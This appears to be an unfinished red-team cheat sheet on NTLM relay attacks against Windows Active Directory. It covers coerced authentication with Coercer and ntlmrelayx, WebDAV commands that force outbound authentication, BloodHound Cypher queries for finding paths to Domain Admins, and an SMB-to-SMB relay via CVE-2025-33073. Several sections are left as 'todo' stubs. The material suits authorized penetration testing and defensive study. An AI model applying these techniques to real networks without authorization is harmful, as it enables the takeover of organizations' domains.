NTLM Relaying Tips and Tricks
NTLM Relay Cheat Sheet
Note: The cheat sheet assumes modern Windows with NTLMv2 being used. NTLMv1 acts the same as HTTP and can be relayed to anything indicated by the “1”. When relaying NTLMv1 using ntlmrelayx you must use the --remove-mic flag in most cases (such as SMB->LDAP).
Coerced Authentication via RPC Methods (PetitPotam, ShadowCoerce, DFSCoerce, SpoolSample, etc.)
Coercer is your best bet. It covers many of the PoCs discovered into a single well tested tool. It also works well using a SOCKS5 proxy. Remember to use the --auth-type {smb,http} flag because in many cases you want HTTP. It can almost always coerce SMB auth, and sometimes HTTP (via WebDAV) if the WebClient service is running.
ntlmrelayx is the de facto relaying tool. It can capture auth on a wide range of protocols, relay to a wide range of services, and automatically perform many attacks.
Checking for WebDAV
The Windows WebClient service can be used to determine if coerced auth via WebDAV (HTTP) will work. Any Domain User can determine if that service is running to find good potential relay victims.
- Linux: https://github.com/Hackndo/WebclientServiceScanner
- Linux: https://github.com/Pennyw0rth/NetExec
- Windows: https://github.com/MorDavid/SharpWebClientScanner
You can send out auth using WebDAV with different ports, and HTTP/HTTPS like so:
dir \\bbout\folder
dir \\bbout@8443\folder
dir \\bbout@SSL\folder
dir \\bbout@SSL@8443\folder
Its probably also worth marking all these targets in BloodHound to see which gives paths to DA like so:
Neo4j Console Bulk Mark as Owned
MATCH (u:Computer) WHERE (u.name IN [
"SERVER1.CONTOSO.COM",
"SERVER2.CONTOSO.COM",
"SERVER3.CONTOSO.COM",
"SERVER4.CONTOSO.COM"
]) SET u.owned = true
Shortest Path to DA from Owned Computers
The new BloodHound CE uses a different system for owned users, so you'll have to write your own cypher qureies like so:
MATCH p=shortestPath((s:Computer)-[:Owns|GenericAll|GenericWrite|WriteOwner|WriteDacl|MemberOf|ForceChangePassword|AllExtendedRights|AddMember|HasSession|GPLink|AllowedToDelegate|CoerceToTGT|AllowedToAct|AdminTo|CanPSRemote|CanRDP|ExecuteDCOM|HasSIDHistory|AddSelf|DCSync|ReadLAPSPassword|ReadGMSAPassword|DumpSMSAPassword|SQLAdmin|AddAllowedToAct|WriteSPN|AddKeyCredentialLink|SyncLAPSPassword|WriteAccountRestrictions|WriteGPLink|GoldenCert|ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC6a|ADCSESC6b|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13|SyncedToEntraUser|CoerceAndRelayNTLMToSMB|CoerceAndRelayNTLMToADCS|WriteOwnerLimitedRights|OwnsLimitedRights|CoerceAndRelayNTLMToLDAP|CoerceAndRelayNTLMToLDAPS|Contains|DCFor|SameForestTrust|SpoofSIDHistory|AbuseTGTDelegation*1..]->(t:Group))
WHERE s.enabled = true
AND s.owned = true
AND t.objectid ENDS WITH '-512'
RETURN p
Then simply coerce the best targets and compromise them via RBCD or Shadow Creds.
CVE-2025-33073
If computers are missing CVE-2025-33073, and doesn't require SMB signing, you can relay SMB->SMB using CVE-2025-33073. This effectivaly gets admin on the computer.
via Spoofing Attacks (LLMNR, NBT-NS, MDNS, DHCPv6 DNS takeover, ARP, etc.)
- todo
via Share Poisoning (.lnk, .url, .library-ms, .searchConnector-ms, etc.)
- todo
Post-Exploitation
Resource Based Constrained Delegation
- todo
Shadow Credentials
- todo